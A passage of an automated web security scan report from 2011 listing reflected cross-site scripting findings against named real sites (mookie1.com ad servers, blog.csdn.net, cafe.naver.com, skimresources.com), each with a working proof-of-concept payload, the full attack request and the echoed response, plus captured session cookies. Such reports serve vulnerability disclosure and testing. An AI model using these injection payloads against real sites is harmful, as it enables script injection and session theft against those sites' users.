Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1732ad"><script>alert(1)</script>dbf52c5f68/BTRT1/728/326445065/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.79. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f4d"><script>alert(1)</script>b561cc16413 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT199f4d"><script>alert(1)</script>b561cc16413/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT199f4d"><script>alert(1)</script>b561cc16413/728/98466057/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.80. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf0eb"><script>alert(1)</script>ba41c20be5c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728cf0eb"><script>alert(1)</script>ba41c20be5c/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728cf0eb"><script>alert(1)</script>ba41c20be5c/970169256/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.81. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a209"><script>alert(1)</script>60585c96bd7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x901a209"><script>alert(1)</script>60585c96bd7 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/770431857/x901a209"><script>alert(1)</script>60585c96bd7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.82. http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.csdn.net
Path:   /jiji262/archive/2007/07/28/1713771.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3541f'style='x:expression(alert(1))'7b381ee316b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /jiji262/archive/2007/07/28/1713771.aspx?3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b=1 HTTP/1.1
Host: blog.csdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Wed, 09 Feb 2011 13:28:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 64116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='m&#97;ilto&#58;webmaster&#64;csdn&#46;net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1713771&3541f'style='x:expression(alert(1))'7b381ee316b=1'>
...[SNIP]...

1.83. http://blog.csdn.net/jiji262/archive/2007/08/12/1739715.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.csdn.net
Path:   /jiji262/archive/2007/08/12/1739715.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0cf4'style%3d'x%3aexpression(alert(1))'3d59d223c0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0cf4'style='x:expression(alert(1))'3d59d223c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /jiji262/archive/2007/08/12/1739715.aspx?e0cf4'style%3d'x%3aexpression(alert(1))'3d59d223c0b=1 HTTP/1.1
Host: blog.csdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.68
Date: Wed, 09 Feb 2011 13:28:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Length: 39967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='m&#97;ilto&#58;webmaster&#64;csdn&#46;net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1739715&e0cf4'style='x:expression(alert(1))'3d59d223c0b=1'>
...[SNIP]...

1.84. http://cafe.naver.com/javamaker.cafe [iframe_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafe.naver.com
Path:   /javamaker.cafe

Issue detail

The value of the iframe_url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//7c86965c was submitted in the iframe_url parameter. This input was echoed as javascript:alert(1)//7c86965c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javamaker.cafe?iframe_url=javascript%3aalert(1)//7c86965c HTTP/1.1
Host: cafe.naver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:41:13 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: nci4=""; Domain=.cafe.naver.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: nci4=467490b5ace3823c638dcaddd022533d8ad426ce95d605d60ceee30193a753b655bf6bbb4d7fc8c284155c8560c647b911393403d9d1b1968261f765d5ea7791c8eef4fbdafdce808dfff2d5f5c696e3efc7e2d39aebe6c1d8e9da49; Domain=.cafe.naver.com; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243G6zj; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:20 GMT; Path=/
Set-Cookie: ncvc2=b8d82004506667d3fc017f46718aec96337b997d2f0f9f0ee26040912b04ed21e00cce15cdef7d5624bae03f8ecb; Domain=.cafe.naver.com; Expires=Wed, 09-Feb-2011 14:11:13 GMT; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243tQIg; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:20 GMT; Path=/
Set-Cookie: JSESSIONID=ADF43B6DFCF956425C622250F73D6534; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ks_c_5601-1987
Content-Length: 95808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=KSC5601">
<title>J
...[SNIP]...
<iframe name="cafe_main" id="cafe_main" src="javascript:alert(1)//7c86965c?clubid=16593684" width="773" height="100%" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" allowtransparency="true">
...[SNIP]...

1.85. http://cafe.naver.com/specialj.cafe [iframe_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cafe.naver.com
Path:   /specialj.cafe

Issue detail

The value of the iframe_url request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload javascript%3aalert(1)//112db26c was submitted in the iframe_url parameter. This input was echoed as javascript:alert(1)//112db26c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specialj.cafe?iframe_url=javascript%3aalert(1)//112db26c HTTP/1.1
Host: cafe.naver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:41:08 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: nci4=""; Domain=.cafe.naver.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: nci4=2412f2dacf85ec5201efa8bfb259204ceab244abf886699248bc47d9296a90567676b612b673034a20bf7748f02bd29213b783036741d3f4e003954095a44f8c949bbe99ae9e929db493a0ef9994ac8fbd948e81a087b4f8b4bb9ebe8cc3beb691b59ad5a6a988af9cad59; Domain=.cafe.naver.com; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.24362Fm; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:15 GMT; Path=/
Set-Cookie: ncvc2=b8d82004506667d3fc017f46718aec96337b997d2f7e9b32e56040952b09ec25ec00ce15cdef7d5624bae03f8e69; Domain=.cafe.naver.com; Expires=Wed, 09-Feb-2011 14:11:08 GMT; Path=/
Set-Cookie: ncvid=#vid#_173.193.214.243C3CS; Domain=.cafe.naver.com; Expires=Mon, 27-Feb-2079 16:55:15 GMT; Path=/
Set-Cookie: JSESSIONID=5657F168F3E9FB9976315CE3CDBBB602; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ks_c_5601-1987
Content-Length: 81682

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=KSC5601">
<title>.
...[SNIP]...
<iframe name="cafe_main" id="cafe_main" src="javascript:alert(1)//112db26c?clubid=12542248" width="773" height="100%" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" allowtransparency="true">
...[SNIP]...

1.86. http://d.skimresources.com/api/index.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.skimresources.com
Path:   /api/index.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 897d0<script>alert(1)</script>ffdf231be2f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/index.php?callback=skimwordsDataCallback897d0<script>alert(1)</script>ffdf231be2f&data=%7B%22page%22%3A%22http%3A%2F%2Ftechnorati.com%2F%22%7D HTTP/1.1
Host: d.skimresources.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: skimGUID=6870A8E5A2DABB0C248AD2A4AAF369FF

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 09 Feb 2011 14:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
Content-Length: 398
Connection: keep-alive

skimwordsDataCallback897d0<script>alert(1)</script>ffdf231be2f({"words":[],"includes":[],"excludes":[],"maxkeywords":0,"impression":1,"reindex":0,"thispage":"http:\/\/technorati.com\/","original_length":0,"useragent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-
...[SNIP]...

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53335"><script>alert(1)</script>d5e2383b59e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM53335"><script>alert(1)</script>d5e2383b59e/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM53335"><script>alert(1)</script>d5e2383b59e/2010DM/1132110277/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3c29"><script>alert(1)</script>92b43a2f943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe3c29"><script>alert(1)</script>92b43a2f943/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe3c29"><script>alert(1)</script>92b43a2f943/336196242/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11256086249@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1150b"><script>alert(1)</script>a68df653d3d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11256086249@x231150b"><script>alert(1)</script>a68df653d3d?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1807529050/x231150b"><script>alert(1)</script>a68df653d3d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/11311693468@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11311693468@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a03"><script>alert(1)</script>dd801c10d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM68a03"><script>alert(1)</script>dd801c10d99/2010DM/11311693468@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90
